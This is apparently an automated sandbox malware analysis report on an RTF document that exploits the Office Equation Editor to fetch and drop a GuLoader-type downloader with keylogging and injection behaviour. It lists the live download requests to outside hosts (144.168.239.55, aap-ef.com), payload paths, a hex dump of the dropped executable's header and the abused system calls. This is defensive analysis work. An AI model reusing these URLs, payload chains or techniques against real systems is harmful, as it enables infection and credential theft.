Analysis Report 8825358c-c9a2-4b41-9da6-2ff1c62969d9

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: aap-ef.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 213.239.204.60:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 144.168.239.55:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 03 Dec 2020 08:53:54 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Wed, 02 Dec 2020 14:26:58 GMTETag: "e000-5b57c093254ad"Accept-Ranges: bytesContent-Length: 57344Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 a8 63 4f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 00 00 00 20 00 00 00 00 00 00 a0 11 00 00 00 10 00 00 00 c0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 09 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 10 00 00 b4 4a 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 af 00 00 28 00 00 00 00 d0 00 00 34 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 a2 00 00 00 10 00 00 00 b0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 50 0a 00 00 00 c0 00 00 00 10 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 0c 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55
Source: unknown	TCP traffic detected without corresponding DNS query: 144.168.239.55

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{16BAD8F7-5649-4CA3-B477-D1894D362AA0}.tmp

Source: global traffic	HTTP traffic detected: GET /win/Apocalypst.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 144.168.239.55Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /img/Breitburn_New_HTRJPFgzJ99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aap-ef.comCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: aap-ef.com

Source: vbc.exe, 00000004.00000003.2106991455.000000000084A000.00000004.00000001.sdmp	String found in binary or memory: http://aap-ef.com/img/Breitburn_New_HTRJPFgzJ99.bin
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.2111772656.000000001ED42000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: vbc.exe, 00000004.00000003.2111619970.000000001ED26000.00000004.00000001.sdmp	String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmp	String found in binary or memory: https://aap-ef.com/-
Source: vbc.exe, 00000004.00000003.2106932336.0000000000855000.00000004.00000001.sdmp	String found in binary or memory: https://aap-ef.com/W
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: vbc.exe, 00000004.00000003.2111825228.000000001ED3A000.00000004.00000001.sdmp	String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.hu/docs/
Source: vbc.exe, 00000004.00000003.2111744787.000000001ED35000.00000004.00000001.sdmp	String found in binary or memory: https://www.netlock.net/docs

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\Public\vbc.exe

Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270456 EnumWindows,NtSetInformationThread,	3_2_00270456
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027633E NtProtectVirtualMemory,	3_2_0027633E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002725FB NtWriteVirtualMemory,	3_2_002725FB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002767DE NtResumeThread,	3_2_002767DE
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276839 NtResumeThread,	3_2_00276839
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276A01 NtResumeThread,	3_2_00276A01
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027201E NtWriteVirtualMemory,	3_2_0027201E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272242 NtWriteVirtualMemory,	3_2_00272242
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00271842 NtWriteVirtualMemory,	3_2_00271842
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027284C NtWriteVirtualMemory,	3_2_0027284C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272651 NtWriteVirtualMemory,	3_2_00272651
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00272A5C NtWriteVirtualMemory,	3_2_00272A5C
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276898 NtResumeThread,	3_2_00276898
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276A98 NtResumeThread,	3_2_00276A98
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002726E8 NtWriteVirtualMemory,	3_2_002726E8
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002768E8 NtResumeThread,	3_2_002768E8
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002704F3 NtSetInformationThread,	3_2_002704F3
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002728DC NtWriteVirtualMemory,	3_2_002728DC
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270520 NtSetInformationThread,	3_2_00270520
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276B2A NtResumeThread,	3_2_00276B2A
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00276964 NtResumeThread,	3_2_00276964
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002727A4 NtWriteVirtualMemory,	3_2_002727A4
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002769B0 NtResumeThread,	3_2_002769B0
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0027299D NtWriteVirtualMemory,	3_2_0027299D
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002767E4 NtResumeThread,	3_2_002767E4

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 3_2_004011A0	3_2_004011A0
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00408A5D	3_2_00408A5D
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0040886E	3_2_0040886E
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00408AAA	3_2_00408AAA

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00401180 appears 48 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winRTF@11/14@1/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$25358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE1F5.tmp

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY

Yara detected VB6 Downloader Generic

Source: Yara match

File source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405A50 push ebp; retf	3_2_00405B25
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405857 push es; ret	3_2_004058AB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405A7E push ebp; retf	3_2_00405B25
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00270054 pushad ; ret	3_2_00270068
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002743E8 push es; ret	3_2_002743CB
Source: C:\Users\Public\vbc.exe	Code function: 3_2_002743C8 push es; ret	3_2_002743CB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\Public\vbc.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
